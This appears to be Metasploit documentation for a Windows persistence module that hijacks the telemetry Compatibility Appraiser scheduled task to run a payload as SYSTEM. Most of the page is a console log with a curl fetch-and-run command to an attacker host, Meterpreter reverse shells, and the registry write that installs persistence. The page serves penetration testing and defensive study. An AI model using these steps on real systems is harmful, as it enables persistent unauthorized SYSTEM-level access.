CoCalc -- telemetry.md

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/persistence/telemetry.md
⁵⁹⁹⁸⁷ views

Vulnerable Application

This persistence mechanism installs a new telemetry provider for windows. If telemetry is turned on, when the scheduled task launches, it will execute the telemetry provider and execute our payload with system permissions.

Verification Steps

Start msfconsole
Get an admin level shell on windows
Do: use exploit/windows/persistence/telemetry
Do: set session #
Do: run
You should get a shell when the scheduled task runs.

Options

PAYLOAD_NAME

Name of payload file to write. Random string as default.

NAME

Name of the telemetry program. Random string as default.

Scenarios

Windows 10 1909 (10.0 Build 18363)

Get an admin level shell

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe

[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450 
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50293) at 2026-01-03 13:12:03 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...

Install persistence

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/telemetry 
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/telemetry) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/telemetry) > set session 1
session => 1
msf exploit(windows/persistence/telemetry) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/telemetry) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Appraiser name found: Microsoft Compatibility Appraiser
[+] Next scheduled runtime: 1/4/2026 4:10:25 AM
[*] Checking registry write access to: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\qIJwhRtzyhRm
[+] The target is vulnerable. Registry writable
[+] Writing payload to C:\Users\windows\AppData\Local\Temp\blaWvMM.exe
[*] Using telemetry id: uYmoknDG
[+] Persistence installed! Call a shell immediately using 'schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"' (SYSTEM) or CompatTelRunner.exe (user)
       or wait till 1/4/2026 4:10:25 AM (SYSTEM)
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260103.2023/WIN10PROLICENSE_20260103.2023.rc

Trigger the scheduled task instead of waiting

msf exploit(windows/persistence/telemetry) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2344 created.
Channel 4 created.
Microsoft Windows [Version 10.0.18363.2274]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
SUCCESS: Attempted to run the scheduled task "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser".

C:\WINDOWS\system32>exit
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/persistence/telemetry) > date
[*] exec: date

Sat Jan  3 01:30:05 PM EST 2026
msf exploit(windows/persistence/telemetry) > 
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50305) at 2026-01-03 13:30:51 -0500

msf exploit(windows/persistence/telemetry) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  1         meterpreter x64/windows  WIN10PROLICENSE\windows @ WIN10PROLICENSE  1.1.1.1:4450 -> 2.2.2.2:50293 (2.2.2.2)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN10PROLICENSE      1.1.1.1:4444 -> 2.2.2.2:50305 (2.2.2.2)